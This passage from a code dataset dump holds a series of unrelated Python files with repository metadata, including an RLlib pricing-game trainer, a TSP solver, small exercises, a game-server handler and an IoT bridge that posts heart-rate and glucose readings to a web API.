gym_bertrandcompetition.envs.bertrand_competition_discrete import BertrandCompetitionDiscreteEnv\n\nimport ray\nimport numpy as np\nfrom ray.tune.registry import register_env\nimport ray.rllib.agents.a3c as a3c\nfrom ray.rllib.agents.dqn import DQNTrainer\n# from ray.rllib.agents.ppo import PPOAgent\nfrom ray.tune.logger import pretty_print\n\n# from ray.rllib.env import MultiAgentEnv\n\n# cd OneDrive/Documents/Research/RLcollusionpricing\n\n# env = gym.make('BertrandCompetitionDiscrete-v0')\n\nconfig = {\n 'env_config': {\n 'num_agents': 2,\n },\n 'env': 'Bertrand',\n 'num_workers': 2,\n # 'eager': True,\n # 'use_pytorch': False,\n 'train_batch_size': 200,\n 'rollout_fragment_length': 200,\n 'lr': 0.001\n}\n\n# class Rwrapper(gym.RewardWrapper):\n# def __init__(self, env):\n# self.reward_range = env.reward_range\n# super(gym.RewardWrapper, self).__init__(env)\n# def reward(self, reward):\n# return reward\n# register_env('Bertrand', lambda env_config: Rwrapper(BertrandCompetitionDiscreteEnv()))\n\n\nregister_env('Bertrand', lambda env_config: BertrandCompetitionDiscreteEnv())\nray.init(num_cpus=4)\ntrainer = DQNTrainer(config = config, env = 'Bertrand')\n\n# register_env('Bertrand', lambda env_config: BertrandCompetitionDiscreteEnv())\n# trainer = PPOAgent(config = config, env = 'Bertrand')\n\ns = \"{:3d} reward {:6.2f}/{:6.2f}/{:6.2f} len {:6.2f}\"\n\npN = 1\npM = 10\nxi = 0.1\nm = 15\n\na_space = np.linspace(pN - xi * (pM - pN), pM + xi * (pM - pN), m)\n\nfor i in range(20):\n result = trainer.train()\n # print(pretty_print(result))\n print(s.format(\n i + 1,\n result[\"episode_reward_min\"],\n result[\"episode_reward_mean\"],\n result[\"episode_reward_max\"],\n result[\"episode_len_mean\"]))\n\n # print(trainer.compute_action({'agent_0': (a_space[3], a_space[3]), 'agent_1': (a_space[3], a_space[3])}))\n # print(trainer.compute_action({'agent_0': (0, 0), 'agent_1': (0, 0)}))\n # print(trainer.compute_action(a_space[3], a_space[3]))","repo_name":"nlepore33/RLcollusionpricing","sub_path":"gym_bertrand_test.py","file_name":"gym_bertrand_test.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38060081606","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# Path: asreviewcontrib\\semantic_clustering\\main.py\n\nimport argparse\nimport sys\n\nimport webbrowser\nfrom pathlib import Path\n\nfrom asreview.data import load_data\nfrom asreview.entry_points import BaseEntryPoint\nfrom asreviewcontrib.semantic_clustering.interactive import run_app\nfrom asreviewcontrib.semantic_clustering.semantic_clustering import run_clustering_steps # noqa: E501\n\n\nclass SemClusEntryPoint(BaseEntryPoint):\n description = \"Semantic clustering tools for ASReview.\"\n extension_name = \"semantic_clustering\"\n\n def __init__(self):\n self.version = \"0.1\"\n\n def execute(self, argv):\n args = _parse_arguments(\n version=f\"{self.extension_name}: {self.version}\", argv=argv)\n\n if args.filepath:\n data = load_data(args.filepath)\n run_clustering_steps(\n data,\n args.output,\n transformer=args.transformer)\n\n elif args.app:\n url = \"http://127.0.0.1:8050/\"\n webbrowser.open(url, new=2, autoraise=True)\n run_app(args.app)\n sys.exit(1)\n\n\n# check file extension\ndef _valid_file(fp):\n if Path(fp).suffix.lower() != \".csv\":\n raise ValueError('File must have a .csv extension')\n\n\n# argument parser\ndef _parse_arguments(version=\"Unknown\", argv=None):\n parser = argparse.ArgumentParser(prog='asreview semantic_clustering')\n group = parser.add_mutually_exclusive_group()\n\n group.add_argument(\n \"-f\",\n \"--filepath\",\n metavar=\"INPUT FILEPATH\",\n help=\"processes the specified file\",\n type=str,\n )\n group.add_argument(\n \"-a\",\n \"--app\",\n metavar=\"INPUT FILEPATH\",\n help=\"runs the app from a file created with the semantic clustering \"\n \"extension\",\n type=argparse.FileType('r', encoding='UTF-8')\n )\n\n parser.add_argument(\n \"-v\",\n \"--version\",\n action=\"version\",\n version=\"%(prog)s \" + version,\n )\n\n parser.add_argument(\n \"-o\",\n \"--output\",\n help=\"output file name\",\n metavar=\"OUTPUT FILE NAME\",\n type=str,\n default=\"output.csv\"\n )\n\n parser.add_argument(\n \"--transformer\",\n help=\"select a transformer to use\",\n metavar=\"TRANSFORMER\",\n type=str,\n default='allenai/scibert_scivocab_uncased'\n )\n\n # Exit if no arguments are given\n if len(argv) == 0:\n parser.print_help(sys.stderr)\n sys.exit(1)\n\n args = parser.parse_args(argv)\n\n # Check if the file extension is correct\n if args.app is not None:\n _valid_file(args.app.name)\n\n if args.output is not None:\n _valid_file(args.output)\n\n return args\n","repo_name":"asreview/semantic-clusters","sub_path":"asreviewcontrib/semantic_clustering/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"72292278170","text":"from typing import List, Callable\n\nfrom langchain.docstore.document import Document\nfrom langchain.vectorstores.pgvector import PGVector\n\nfrom vectorstore.base import CustomBaseVectorStore\nfrom app.core.configuration import settings\nfrom app.utils.constants import VectorDatabaseConstants\n\n\nclass CustomPGVector(PGVector, CustomBaseVectorStore):\n def __init__(\n self,\n embedding_function: Callable,\n collection_name: str,\n ) -> None:\n pass\n # connection_string = settings.SQLALCHEMY_DATABASE_URI\n # super().__init__(connection_string, embedding_function, collection_name)\n\n def connect_to_vectorstore(self):\n return super().connect()\n\n def insert_documents(self, docs: List[Document]):\n self.add_documents(docs)\n\n def search_documents(\n self, query: str, top_k: int, query_preprocessing: bool = False\n ) -> List[Document]:\n if query_preprocessing:\n query = self.preprocess_text(query)\n\n relevant_documents = self.similarity_search(query=query, k=top_k)\n\n return self._token_safe_documents(\n relevant_documents, query, conversation_history_token=0\n )\n\n def delete_documents(self, docs: List[Document]):\n raise NotImplementedError(\"method implementation pending\")\n\n def update_documents(self, docs: List[Document]):\n raise NotImplementedError(\"method implementation pending\")\n\n\ncustom_pgvector = CustomPGVector(\n collection_name=\"langchain-pgvectore\",\n embedding_function=VectorDatabaseConstants.VECTOR_EMBEDDING.value,\n)\n","repo_name":"mitul-kalariya/NBIC","sub_path":"application/vectorstore/custom_pgvector.py","file_name":"custom_pgvector.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"4435019917","text":"# 5'. Даны два файла, в каждом из которых находится запись многочлена. \n# Задача - сформировать файл, содержащий сумму многочленов\n# В file1.txt :\n# 2*x**2 + 4*x + 5\n# В file2.txt:\n# 4*x**2 + 1*x + 4\n# Результирующий файл:\n# 6*x**2 + 5*x + 9\n\nimport sympy\n\ndef get_polynom(file_num: int) -> str:\n \"\"\"Взять многочлен из файла\"\"\"\n with open(f'file{file_num}.txt', 'r') as f:\n polynom = f.readline()\n return polynom\n\n\n\"\"\"Сумма двух многочленов\"\"\"\npolynom1 = sympy.simplify(get_polynom(1))\npolynom2 = sympy.simplify(get_polynom(2))\nprint('\\t\\t' + str(polynom1) + '\\n\\t\\t' + str(polynom2))\nx = sympy.Symbol('x')\npolynom = str(sympy.simplify(polynom1 + polynom2))\nprint('Сумма = ' + polynom)\nwith open('file3.txt', 'w') as f:\n f.write(polynom)\n","repo_name":"ShevchenkoJS/DzPython4","sub_path":"task5.py","file_name":"task5.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18839996638","text":"from player import Player\r\nfrom field import Field\r\n\r\n\r\nclass Game:\r\n def __init__(self):\r\n self.__players = [Player('Player 1'), Player('Player 2')]\r\n self.__fields = [Field() for player in self.__players] #enemy field for each player\r\n self.__current_player = 0\r\n\r\n def shoot_at(self, index, pos):\r\n self.__fields[index].shoot_at(pos)\r\n\r\n def field_with_ships(self, index):\r\n return self.__fields[index].field_with_ships()\r\n\r\n def field_without_ships(self, index):\r\n return self.__fields[index].field_without_ships()\r\n\r\n def play(self):\r\n while True:\r\n for i in range(len(self.__players)):\r\n print(\"Enemy field:\\n\" + str(self.__fields[i]))\r\n self.__fields[i].shoot_at(self.__players[i].read_position())\r\n if not self.__fields[i].has_alive_ships():\r\n print(self.__players[i], 'win!')\r\n\r\n\r\ndef test():\r\n p = Player('Simple AI')\r\n f = Field()\r\n for x in range(f.field_size[0]):\r\n for y in range(f.field_size[1]):\r\n print(f)\r\n shoot_pos = (x,y)\r\n print('Shoot at pos:', shoot_pos)\r\n f.shoot_at(shoot_pos)\r\n if not f.has_alive_ships():\r\n print(p, \"win\")\r\n return\r\n","repo_name":"anyahayda/Battleship","sub_path":"BattleshipPart2/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3862531423","text":"# -*- coding: utf-8 -*-\nimport ffext\nimport msgtype.ttypes as MsgDef\nimport weakref\nfrom base import Base\nfrom model import TeamModel, PlayerModel, ItemModel, ArenaModel\nfrom db import DbService\n\ndef buildErrMsg(cmd, errMsg):\n return MsgDef.ErrorMsgRet(0, cmd, errMsg)#'cmd=%d,errMsg=%s'%(cmd, errMsg)\n\n#竞技场购买价格\nAREANA_BUY_PRICE = [\n [1,\t2000],\n [2,\t3000],\n [3,\t4000],\n [4,\t5000],\n [5,\t6000],\n [6,\t7000],\n [7,\t8000],\n [8,\t9000],\n [9,\t10000],\n [10,11000],\n]\n#竞技场\n@ffext.onLogic(MsgDef.ClientCmd.ARENA_OPS, MsgDef.ArenaOpsReq)\ndef processArenaReq(session, msg = None):\n player = session.player\n arenaCtrl = player.arenaCtrl\n if msg.opstype == 0 or msg.opstype == 1:#0表示显示竞技场数据\n retMsg = MsgDef.ArenaOpsRet(msg.opstype, arenaCtrl.leftChallengeTimes, arenaCtrl.score, ArenaModel.getArenaMgr().getRankByUid(player.uid), [])\n retMsg.listPlayers = ArenaModel.getArenaMgr().allRank\n session.sendMsg(MsgDef.ServerCmd.ARENA_OPS, retMsg)\n elif msg.opstype == 2:#显示积分兑换\n retMsg = MsgDef.ArenaOpsRet(msg.opstype, arenaCtrl.leftChallengeTimes, arenaCtrl.score, arenaCtrl.rank, [], [])\n\n for k, itemCfgPair in ItemModel.getItemMgr().arenaScoreItem.iteritems():\n item = MsgDef.Item()\n itemCfg = itemCfgPair[0]\n ItemModel.tmpBuildItem(item, itemCfg)\n retMsg.listItems.append(MsgDef.ArenaScore2Item(itemCfgPair[1], item))\n session.sendMsg(MsgDef.ServerCmd.ARENA_OPS, retMsg)\n return\n elif msg.opstype == 3:#积分兑换\n cfgid = msg.idArg\n destCfg = None\n if msg.numArg < 0:\n msg.numArg = 1\n for k, itemCfgPair in ItemModel.getItemMgr().arenaScoreItem.iteritems():\n itemCfg = itemCfgPair[0]\n if itemCfg.cfgId == cfgid:\n destCfg = itemCfgPair\n break\n if None == destCfg:\n session.sendMsg(MsgDef.ServerCmd.ERROR_MSG, buildErrMsg(MsgDef.ClientCmd.ARENA_OPS, '参数有误'))\n return\n score = destCfg[1] * msg.numArg\n if player.arenaCtrl.score < score:\n session.sendMsg(MsgDef.ServerCmd.ERROR_MSG, buildErrMsg(MsgDef.ClientCmd.ARENA_OPS, '积分不足'))\n return\n needPkgNum = msg.numArg\n if destCfg[0].flagDieJia:\n needPkgNum = 1\n if player.itemCtrl.getFreePkgSize() < needPkgNum:\n session.sendMsg(MsgDef.ServerCmd.ERROR_MSG, buildErrMsg(MsgDef.ClientCmd.ARENA_OPS, '包裹不足'))\n return\n player.AddScoreArena(-1 * score)\n itemObj = player.itemCtrl.addItemByCfgId(cfgid)\n from handler import ItemHandler\n ItemHandler.processQueryPkg(session)\n retMsg = MsgDef.ArenaOpsRet(msg.opstype, arenaCtrl.leftChallengeTimes, arenaCtrl.score, arenaCtrl.rank, [], [])\n session.sendMsg(MsgDef.ServerCmd.ARENA_OPS, retMsg)\n\n return\n elif msg.opstype == 4:#挑战某人\n if player.arenaCtrl.leftChallengeTimes <= 0:\n session.sendMsg(MsgDef.ServerCmd.ERROR_MSG, buildErrMsg(MsgDef.ClientCmd.ARENA_OPS, '每天最多挑战10次'))\n return\n ArenaModel.getArenaMgr().createArena(session.player, msg.destuid)\n return\n","repo_name":"fanchy/spython","sub_path":"pysrc/handler/ArenaHandler.py","file_name":"ArenaHandler.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"29922005777","text":"\ndef handle_two_digits(s):\n if not s: return 0\n ones = ['zero', 'one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine', 'ten', 'eleven', 'twelve', 'thirteen', 'fourteen', 'fifteen', 'sixteen', 'seventeen', 'eighteen', 'nineteen'] \n tens = ['zero', 'ten', 'twenty', 'thirty', 'fourty', 'fifty', 'sixty', 'seventy', 'eighty', 'ninety']\n if ' ' in s:\n x,y = s.split(' ')\n return 10 * tens.index(x) + ones.index(y)\n if s in ones:\n return ones.index(s)\n return 10 * tens.index(s)\n \ndef eng2nums(s):\n if ' hundred' in s:\n x,y = s.split(' hundred')\n return 100 * handle_two_digits(x) + handle_two_digits(y.lstrip())\n return handle_two_digits(s)\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"9cuQrhEMwiESfKznk_14.py","file_name":"9cuQrhEMwiESfKznk_14.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30012083298","text":"\"\"\"\nThis program is a modification based on work created and shared by Google (https://developers.google.com/readme/policies) and used according to terms described in the Apache 2.0 License (https://www.apache.org/licenses/LICENSE-2.0).\nThe original code can be found in https://developers.google.com/optimization/routing/tsp\n\"\"\"\n\nimport math\nfrom random import random\nfrom ortools.constraint_solver import routing_enums_pb2\nfrom ortools.constraint_solver import pywrapcp\nfrom matplotlib.path import Path\nfrom matplotlib import patches\nimport matplotlib.pyplot as plt\n\n\ndef create_data_model():\n \"\"\"Stores the data for the problem.\"\"\"\n data = {}\n # Locations in block units\n data['locations'] = [(random()*100, random()*100) for i in range(100)]\n data['num_vehicles'] = 1\n data['depot'] = 0\n return data\n\n\ndef compute_euclidean_distance_matrix(locations):\n \"\"\"Creates callback to return distance between points.\"\"\"\n distances = {}\n for from_counter, from_node in enumerate(locations):\n distances[from_counter] = {}\n for to_counter, to_node in enumerate(locations):\n if from_counter == to_counter:\n distances[from_counter][to_counter] = 0\n else:\n # Euclidean distance\n distances[from_counter][to_counter] = (int(\n math.hypot((from_node[0] - to_node[0]),\n (from_node[1] - to_node[1]))))\n return distances\n\n\ndef print_solution(manager, routing, solution, locations):\n \"\"\"Plots solution on the xy plane.\"\"\"\n \"\"\"Modified from the original code.\"\"\"\n print('Objective: {}'.format(solution.ObjectiveValue()))\n index = routing.Start(0)\n vertices = []\n while not routing.IsEnd(index):\n vertices.append(locations[manager.IndexToNode(index)])\n previous_index = index\n index = solution.Value(routing.NextVar(index))\n fig, ax = plt.subplots()\n x, y = zip(*vertices)\n line, = ax.plot(x, y, 'bo-')\n ax.set_xlim(0, 100)\n ax.set_ylim(0, 100)\n plt.show()\n\n\ndef main():\n \"\"\"Entry point of the program.\"\"\"\n # Instantiate the data problem.\n data = create_data_model()\n\n # Create the routing index manager.\n manager = pywrapcp.RoutingIndexManager(len(data['locations']),\n data['num_vehicles'], data['depot'])\n\n # Create Routing Model.\n routing = pywrapcp.RoutingModel(manager)\n\n distance_matrix = compute_euclidean_distance_matrix(data['locations'])\n\n def distance_callback(from_index, to_index):\n \"\"\"Returns the distance between the two nodes.\"\"\"\n # Convert from routing variable Index to distance matrix NodeIndex.\n from_node = manager.IndexToNode(from_index)\n to_node = manager.IndexToNode(to_index)\n return distance_matrix[from_node][to_node]\n\n transit_callback_index = routing.RegisterTransitCallback(distance_callback)\n\n # Define cost of each arc.\n routing.SetArcCostEvaluatorOfAllVehicles(transit_callback_index)\n\n # Setting first solution heuristic.\n search_parameters = pywrapcp.DefaultRoutingSearchParameters()\n search_parameters.first_solution_strategy = (\n routing_enums_pb2.FirstSolutionStrategy.PATH_CHEAPEST_ARC)\n\n # Solve the problem.\n solution = routing.SolveWithParameters(search_parameters)\n\n # Print solution on console.\n if solution:\n print_solution(manager, routing, solution, data['locations'])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"antenna-three/or-tools","sub_path":"tsp.py","file_name":"tsp.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8650811950","text":"valor = float(input('Qual o valor do imovel? '))\nsalario = float(input('Qual o valor do salario?'))\nq_anos = int(input('Em quantos anos deseja parcelar?'))\n\nmeses = q_anos * 12\nprestacao = valor / meses\npercentual = salario * 0.30\n\nif prestacao > percentual:\n print('Emprestimo negado, o valor da prestação execeu 30% do salario')\nelse:\n print('Emprestimo liberado, o valor da parcela e de {:.2f}R$, parcelados em {} meses'.format(prestacao,meses))\n","repo_name":"DenisSantos35/Aulas-Python-Curso-em-Video","sub_path":"Curso Python/pythonExercicios/ex036.py","file_name":"ex036.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30453783804","text":"import csv\nimport os\nimport cv2\nfrom config import *\n\n\ndef crop_test_img():\n with open(UPLOAD_CSV_TEMPLATE_PATH, 'r', newline='', encoding='UTF-8-sig') as train_csv:\n rows = list(csv.reader(train_csv))\n del rows[0]\n cropping_list = [[y for y in x if len(y) > 0] for x in rows]\n for img in cropping_list:\n file_name = img[0]\n mango_coordinate = img[1:]\n crop_img(\n input_path=os.path.join(MANGO_DATA_DIR, \"Test\", file_name),\n coordinate=mango_coordinate,\n output_path=os.path.join(SAVE_CROPPED_TEST_IMG_DIR, file_name),\n )\n\n print(\"Test image cropping finished\")\n\n\ndef crop_img(input_path, coordinate, output_path):\n if not os.path.exists(input_path):\n raise Exception(f\"Cropping Path Not Found - {input_path}\")\n\n img = cv2.imread(input_path)\n [x, y, w, h] = coordinate\n x, y, w, h = int(float(x)), int(float(y)), int(float(w)), int(float(h))\n crop_img = img[y:y + h, x:x + w]\n cv2.imwrite(output_path, crop_img, [cv2.IMWRITE_JPEG_QUALITY, 100])\n print(f\"write cropped img to {output_path}\")\n\n\ndef main():\n crop_test_img()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"chihong0522/mango-defect-detection-yolov5","sub_path":"test_img_cropping.py","file_name":"test_img_cropping.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"4652979856","text":"import numpy as np\nfrom scipy.sparse import spmatrix, csr_matrix, csc_matrix, coo_matrix\n\n\nclass TemporalMemory:\n def __init__(\n self,\n num_columns: int,\n num_column_cells: int,\n max_segment: int,\n synapse_min=0,\n synapse_init=60,\n synapse_max=100,\n synapse_threshold=50,\n synapse_inc=2,\n synapse_dec=1,\n segment_active_threshold=10,\n segment_match_threshold=7):\n\n self.num_columns = num_columns\n self.num_column_cells = num_column_cells\n self.max_segment = max_segment\n self.num_cells = num_columns * num_column_cells\n\n self.synapse_min = synapse_min\n self.synapse_init = synapse_init\n self.synapse_max = synapse_max\n\n self.synapse_threshold = synapse_threshold\n self.synapse_inc = synapse_inc\n self.synapse_dec = synapse_dec\n\n self.segment_active_threshold = segment_active_threshold\n self.segment_match_threshold = segment_match_threshold\n\n self.active_columns = csr_matrix((1, num_columns))\n\n self.bursting_winner_cells = csr_matrix(\n (num_columns, num_column_cells))\n self.predictive_cells = csr_matrix((num_columns, num_column_cells))\n self.active_cells = csr_matrix((num_columns, num_column_cells))\n self.winner_cells = csr_matrix((num_columns, num_column_cells))\n\n self.potential_synapses = {}\n self.synapse_strengths = {}\n\n def inference(self, active_columns: spmatrix):\n # (max_segment, num_cells, num_cells)\n connected_synapses = {\n idx: matrix >= self.synapse_threshold for idx,\n matrix in self.synapse_strengths.items()} # (segments, cells, cells)\n segment_activations = csr_matrix(\n (self.num_cells, self.max_segment)) # (cells, segments)\n for idx, synapses in connected_synapses.items():\n segment_activations[:, idx] = self.active_cells.dot(synapses)\n\n # (cells, segments)\n active_segments = segment_activations >= self.segment_active_threshold\n predictive_cells = self._reduce_or(\n active_segments, axis=1) # (1, cells)\n\n predictive_active_cells = csr_matrix(\n (self.num_columns, self.num_column_cells))\n for i in range(self.num_column_cells):\n predictive_active_cells[:, i] = active_columns.transpose().multiply(csc_matrix(\n predictive_cells.reshape(self.num_columns, self.num_column_cells))[:, i]) # AND operation, # (1, cells)\n\n predictive_columns = self._reduce_or(\n predictive_cells.reshape(\n self.num_columns,\n self.num_column_cells),\n axis=1) # (1, columns)\n bursting_columns = active_columns - \\\n active_columns.multiply(predictive_columns) # (1, columns)\n\n active_cells = csr_matrix((self.num_columns, self.num_column_cells))\n for i in range(self.num_column_cells):\n active_cells[:, i] = predictive_active_cells[:,\n i].maximum(bursting_columns.transpose())\n return active_cells.reshape((1, self.num_cells))\n\n def _reduce_or(self, matrix: spmatrix, axis: int):\n matrix = coo_matrix(matrix)\n if axis == 0:\n nonzero_indices = np.unique(matrix.col)\n reduced_vector = coo_matrix(\n ([1] * len(nonzero_indices),\n ([0] * len(nonzero_indices),\n nonzero_indices)),\n shape=(\n 1,\n matrix.shape[1]))\n elif axis == 1:\n nonzero_indices = np.unique(matrix.row)\n reduced_vector = coo_matrix(\n ([1] * len(nonzero_indices),\n ([0] * len(nonzero_indices),\n nonzero_indices)),\n shape=(\n 1,\n matrix.shape[0]))\n return csr_matrix(reduced_vector)\n","repo_name":"csongorpilinszkinagy/htm-python","sub_path":"temporal_memory.py","file_name":"temporal_memory.py","file_ext":"py","file_size_in_byte":4032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16333586627","text":"showStr = lambda list : ' '.join(map(str, list))\r\nfrom collections import deque\r\nclass Queue:\r\n def __init__(self, q=None):\r\n if q == None:\r\n self.items = deque()\r\n else:\r\n self.items = deque(q, len(q))\r\n def enQueue(self, i):\r\n self.items.append(i)\r\n def deQueueRight(self):\r\n self.items.pop()\r\n def deQueue(self):\r\n return self.items.popleft()\r\n\r\n def isEmpty(self):\r\n return len(self.items) == 0\r\n\r\n def size(self):\r\n return len(self.items)\r\n def showQueu(self):\r\n Q = []\r\n for i in self.items:\r\n Q.append(i)\r\n return Q\r\n\r\ninp = input(\"Enter choice : \")\r\n\r\nif inp == '1':\r\n q1 = Queue()\r\n q1.enQueue(10)\r\n q1.enQueue(20)\r\n q1.enQueue(30)\r\n print(f'Queue data : {showStr(q1.showQueu())}')\r\n q1.deQueue()\r\n q1.enQueue(40)\r\n print(\"Size of Queue :\",q1.size())\r\n print(f'Queue data : {showStr(q1.showQueu())}')\r\n\r\nif inp == '2':\r\n q1 = Queue()\r\n q1.enQueue(100)\r\n q1.enQueue(200)\r\n q1.enQueue(300)\r\n q1.deQueue()\r\n print(f'Queue data : {showStr(q1.showQueu())}')\r\n print(\"Queue is Empty :\", q1.isEmpty())\r\n\r\nif inp == '3':\r\n q1 = Queue()\r\n q1.enQueue(11)\r\n q1.enQueue(22)\r\n q1.enQueue(33)\r\n q1.deQueue()\r\n q1.deQueue()\r\n q1.deQueue()\r\n if q1.isEmpty() == True:\r\n print(f'Empty Queue')\r\n print(\"Size of Queue :\",q1.size())\r\n print(\"Queue is Empty :\", q1.isEmpty())\r\n","repo_name":"Paramee0598/Data_Structures_ExAndTest","sub_path":"test/L2.py","file_name":"L2.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33641097733","text":"#Embedded file name: c:\\depot\\games\\branches\\release\\EVE-TRANQUILITY\\carbon\\common\\stdlib\\unittest2\\__init__.py\n__all__ = ['TestResult',\n 'TestCase',\n 'TestSuite',\n 'TextTestRunner',\n 'TestLoader',\n 'FunctionTestCase',\n 'main',\n 'defaultTestLoader',\n 'SkipTest',\n 'skip',\n 'skipIf',\n 'skipUnless',\n 'expectedFailure',\n 'TextTestResult',\n '__version__']\n__version__ = '0.1.5'\n__all__.extend(['getTestCaseNames', 'makeSuite', 'findTestCases'])\n__all__.append('_TextTestResult')\nfrom unittest2.result import TestResult\nfrom unittest2.case import TestCase, FunctionTestCase, SkipTest, skip, skipIf, skipUnless, expectedFailure\nfrom unittest2.suite import TestSuite\nfrom unittest2.loader import TestLoader, defaultTestLoader, makeSuite, getTestCaseNames, findTestCases\nfrom unittest2.main import TestProgram, main\nfrom unittest2.runner import TextTestRunner, TextTestResult\n_TextTestResult = TextTestResult","repo_name":"alexcmd/eve","sub_path":"eve-8.21.494548/lib/carbonstdlib/unittest2/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"27339320635","text":"import time\nimport pandas as pd\n\nfrom random import seed\nfrom random import randint\n\nimport serial\nfrom datetime import datetime\nimport numpy as np\nimport requests\nimport threading\n\n## configuration\nPORTNAME = 'COM3'\nseed(datetime.now().strftime(\"%d\"))\n\n\n# class for sending the glucose data every interval\nclass RepeatedTimer(object):\n def __init__(self, interval, function, i, date):\n self._timer = None\n self.interval = interval\n self.function = function\n self.i = i\n self.date = date\n self.is_running = False\n self.next_call = time.time()\n self.start()\n\n def _run(self):\n self.is_running = False\n self.start()\n self.i += 1\n self.function(self.i, self.date)\n\n def start(self):\n if not self.is_running:\n self.next_call += self.interval\n self._timer = threading.Timer(self.next_call - time.time(), self._run)\n self._timer.start()\n self.is_running = True\n\n def stop(self):\n self._timer.cancel()\n self.is_running = False\n\n\nclass Bridge():\n\n def __init__(self):\n self.userID = 1\n\n self.data = pd.read_csv(\"glucose_sensor_refined_data.csv\")\n value = randint(0, len(self.data))\n sample = self.data.iloc[value][\"Date\"]\n self.data = self.data[self.data['Date'] == sample]\n now = datetime.now()\n self.date = now.strftime(\"%Y-%m-%d\")\n self.data = self.data[::-1]\n\n def setup(self):\n\n # open serial port\n self.ser = serial.Serial(PORTNAME, 9600, timeout=0)\n # self.ser.open()\n\n # internal input buffer\n self.inbuffer = []\n\n # buffer that contains the bpm received from the microcontroller\n self.bpm_buffer = []\n\n # delete the glucose data relative to the current day to avoid inconsistencies\n url = f'https://fabioiot.pythonanywhere.com/api/testdelete/?date={self.date}'\n r = requests.delete(url)\n print(r.text)\n print(r.status_code)\n\n # start the periodic sending of glucose data\n self.rt = RepeatedTimer(1, self.sendGlucose, 0, self.date)\n print('Date from which we are getting the glucose data to send')\n print(self.date)\n\n def loop(self):\n # infinite loop\n while (True):\n # look for a byte from serial\n if self.ser.in_waiting > 0:\n # data available from the serial port\n lastchar = self.ser.read(1)\n\n if lastchar == b'\\xfe': # EOL\n print(\"\\nValue received\")\n self.useData()\n self.inbuffer = []\n else:\n # append\n self.inbuffer.append(lastchar)\n\n def sendBpm(self, bpm):\n print(\"inside sendBpm\")\n now = datetime.now()\n date = now.strftime(\"%Y-%m-%d\")\n time = now.strftime(\"%H:%M:%S\")\n type = \"H\"\n value = round(bpm)\n user = self.userID\n\n payload = {'date': date, 'time': time, 'type': type, 'value': value, 'user': user}\n url = 'https://fabioiot.pythonanywhere.com/api/measurements/'\n try:\n r = requests.post(url, data=payload, timeout=60)\n # r = requests.post(url, data=json.dumps(payload), timeout=10) # use this if the API need json\n print('-' * 10)\n print(r.json())\n print(r.status_code)\n print('-' * 10)\n except:\n print(\"Server non raggiungibile bpm\")\n print('-' * 10)\n print(r.status_code)\n print('-' * 10)\n\n return r.status_code\n\n def sendGlucose(self, i, date):\n try:\n row = self.data.iloc[i]\n time = row['Time']\n type = \"G\"\n value = row['Sensor Glucose (mg/dL)']\n user = 1\n\n\n\n payload = {'date': date, 'time': time, 'type': type, 'value': value, 'user': user}\n url = 'https://fabioiot.pythonanywhere.com/api/measurements/'\n r = requests.post(url, data=payload, timeout=60)\n print('-' * 10)\n print(r.json())\n print(r.status_code)\n print('-' * 10)\n except IndexError:\n print(\"Finished sending Glucose data!\")\n self.rt.stop()\n except:\n # controlla se si riesce a prendere l'eccezione dell'iloc a in caso stoppa il tutto\n print(\"Server non raggiungibile glucose\")\n print('-' * 10)\n print(r.status_code)\n print('-' * 10)\n\n def useData(self):\n # I have received a line from the serial port. I can use it\n if len(self.inbuffer) < 2: # at least header, size, footer\n return False\n # split parts\n if self.inbuffer[0] != b'\\xff':\n return False\n\n numval = int.from_bytes(self.inbuffer[1], byteorder='little')\n if numval == 0:\n self.bpm_buffer = []\n else:\n for i in range(numval):\n val = int.from_bytes(self.inbuffer[i + 2], byteorder='little')\n if val > 20:\n self.bpm_buffer.append(val)\n strval = \"Sensor %d: %d \" % (i, val)\n print(strval)\n if len(self.bpm_buffer) == 10:\n avg_bpm = 0\n for bpm in self.bpm_buffer:\n avg_bpm += bpm\n avg_bpm /= 10\n print(\"the mean of BPM is \" + str(avg_bpm))\n t = threading.Thread(target=self.sendBpm, args=[avg_bpm])\n t.start()\n self.ser.write(b'g')\n self.bpm_buffer = []\n\n\nif __name__ == '__main__':\n br = Bridge()\n br.setup()\n br.loop()\n","repo_name":"FabioPolito24/IoT_project","sub_path":"Bridge.py","file_name":"Bridge.py","file_ext":"py","file_size_in_byte":5757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10766451315","text":"from typing import 